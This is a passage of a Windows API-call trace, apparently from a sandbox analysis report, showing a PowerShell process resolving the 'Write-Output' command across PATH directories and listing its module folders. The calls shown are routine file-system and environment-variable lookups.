lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x19 [0218.135] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x19, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0218.135] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\Write-Output.*", lpFindFileData=0x933e7a8 | out: lpFindFileData=0x933e7a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0218.150] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933ea20) returned 1 [0218.150] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933ea2c) returned 1 [0218.151] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x2c [0218.151] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x2c, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0218.151] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933ea04) returned 1 [0218.151] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x933ea80 | out: lpFileInformation=0x933ea80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x172cbef, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x8cfff4c6, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0218.151] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933ea00) returned 1 [0218.151] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933ea80) returned 1 [0218.151] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x2c [0218.151] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x2c, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0218.151] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\Write-Output.*", lpFindFileData=0x933e7a8 | out: lpFindFileData=0x933e7a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0218.152] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933ea20) returned 1 [0218.152] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933ea2c) returned 1 [0218.152] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x34 [0218.152] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps", nBufferLength=0x34, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps", lpFilePart=0x0) returned 0x33 [0218.152] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933ea04) returned 1 [0218.152] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\microsoft\\windowsapps"), fInfoLevelId=0x0, lpFileInformation=0x933ea80 | out: lpFileInformation=0x933ea80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xc88fb23e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17d2dc32, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0218.153] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933ea00) returned 1 [0218.153] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933ea80) returned 1 [0218.153] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x34 [0218.153] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps", nBufferLength=0x34, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps", lpFilePart=0x0) returned 0x33 [0218.153] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps\\Write-Output.*", lpFindFileData=0x933e7a8 | out: lpFindFileData=0x933e7a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0218.153] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933ea20) returned 1 [0218.153] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933ea2c) returned 1 [0218.154] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x933e964, nSize=0xbc | out: lpBuffer="꿬ո螐玮ळ蛣玮၀澪蜇玮䭀̤") returned 0x0 [0218.154] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x933e880, nSize=0xbc | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0218.154] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x933e86c, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0218.154] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x323c478 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0218.155] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x933e874, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0218.155] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x24 [0218.155] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x24, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23 [0218.155] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9ac) returned 1 [0218.155] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath" (normalized: "c:\\programdata\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x933ea28 | out: lpFileInformation=0x933ea28*(dwFileAttributes=0x2410, ftCreationTime.dwLowDateTime=0xac5d590c, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xac5d590c, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xac5d590c, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0218.155] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9a8) returned 1 [0218.155] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933ea28) returned 1 [0218.155] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x24 [0218.155] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x24, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23 [0218.155] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Write-Output.*", lpFindFileData=0x933e750 | out: lpFindFileData=0x933e750*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0218.155] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9c8) returned 1 [0218.156] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9d4) returned 1 [0218.156] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0218.156] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x14, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x0) returned 0x13 [0218.156] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9ac) returned 1 [0218.156] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x933ea28 | out: lpFileInformation=0x933ea28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6ec28c54, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xebb5ab66, ftLastAccessTime.dwHighDateTime=0x1d5d810, ftLastWriteTime.dwLowDateTime=0xebb5ab66, ftLastWriteTime.dwHighDateTime=0x1d5d810, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1 [0218.156] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9a8) returned 1 [0218.156] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933ea28) returned 1 [0218.156] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0218.156] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x14, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x0) returned 0x13 [0218.156] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\system32\\Write-Output.*", lpFindFileData=0x933e750 | out: lpFindFileData=0x933e750*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0218.156] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9c8) returned 1 [0218.156] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9d4) returned 1 [0218.156] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xb [0218.156] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0xb, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS", lpFilePart=0x0) returned 0xa [0218.157] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9ac) returned 1 [0218.157] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x933ea28 | out: lpFileInformation=0x933ea28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xc838b81d, ftLastAccessTime.dwHighDateTime=0x1d41dc3, ftLastWriteTime.dwLowDateTime=0xc838b81d, ftLastWriteTime.dwHighDateTime=0x1d41dc3, nFileSizeHigh=0x0, nFileSizeLow=0x7000)) returned 1 [0218.157] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9a8) returned 1 [0218.157] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933ea28) returned 1 [0218.157] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xb [0218.157] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0xb, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS", lpFilePart=0x0) returned 0xa [0218.157] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\Write-Output.*", lpFindFileData=0x933e750 | out: lpFindFileData=0x933e750*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0218.157] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9c8) returned 1 [0218.157] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9d4) returned 1 [0218.157] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x19 [0218.158] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x19, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0218.158] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9ac) returned 1 [0218.158] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x933ea28 | out: lpFileInformation=0x933ea28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb288124d, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb288124d, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x8000)) returned 1 [0218.158] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9a8) returned 1 [0218.158] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933ea28) returned 1 [0218.158] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x19 [0218.158] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x19, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0218.158] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\Write-Output.*", lpFindFileData=0x933e750 | out: lpFindFileData=0x933e750*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0218.160] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9c8) returned 1 [0218.160] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9d4) returned 1 [0218.160] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x2c [0218.160] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x2c, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0218.160] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9ac) returned 1 [0218.160] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x933ea28 | out: lpFileInformation=0x933ea28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x172cbef, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x8cfff4c6, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0218.161] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9a8) returned 1 [0218.161] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933ea28) returned 1 [0218.161] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x2c [0218.161] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x2c, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0218.161] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\Write-Output.*", lpFindFileData=0x933e750 | out: lpFindFileData=0x933e750*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0218.161] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9c8) returned 1 [0218.161] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9d4) returned 1 [0218.161] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x34 [0218.161] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps", nBufferLength=0x34, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps", lpFilePart=0x0) returned 0x33 [0218.161] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9ac) returned 1 [0218.161] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\microsoft\\windowsapps"), fInfoLevelId=0x0, lpFileInformation=0x933ea28 | out: lpFileInformation=0x933ea28*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xc88fb23e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17d2dc32, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0218.162] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9a8) returned 1 [0218.162] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933ea28) returned 1 [0218.162] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x34 [0218.162] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps", nBufferLength=0x34, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps", lpFilePart=0x0) returned 0x33 [0218.162] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps\\Write-Output.*", lpFindFileData=0x933e750 | out: lpFindFileData=0x933e750*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0218.162] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9c8) returned 1 [0218.162] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9d4) returned 1 [0218.213] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x933e8d8, nSize=0xbc | out: lpBuffer="") returned 0xc3 [0218.213] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x933e8c8, nSize=0xc3 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Users\\FD1HVy\\Documents\\WindowsPowerShell\\Modules;C:\\Program Files (x86)\\WindowsPowerShell\\Modules;C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 0xc2 [0218.215] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules")) returned 0x10 [0218.243] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933ea58) returned 1 [0218.251] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x2b [0218.251] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x2b, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0218.251] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\*", lpFindFileData=0x933e780 | out: lpFindFileData=0x933e780*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bd669e, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb507390a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17bfc901, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x784d9c0 [0218.252] FindNextFileW (in: hFindFile=0x784d9c0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bd669e, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb507390a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17bfc901, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0218.252] FindNextFileW (in: hFindFile=0x784d9c0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bd669e, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb50744c4, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17bd669e, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Operation.Validation", cAlternateFileName="MICROS~1.VAL")) returned 1 [0218.252] FindNextFileW (in: hFindFile=0x784d9c0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb50eaa6c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17bfc901, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement", cAlternateFileName="PACKAG~1")) returned 1 [0218.252] FindNextFileW (in: hFindFile=0x784d9c0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x462363f6, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x462363f6, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester", cAlternateFileName="")) returned 1 [0218.252] FindNextFileW (in: hFindFile=0x784d9c0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb53eacff, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17bfc901, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, 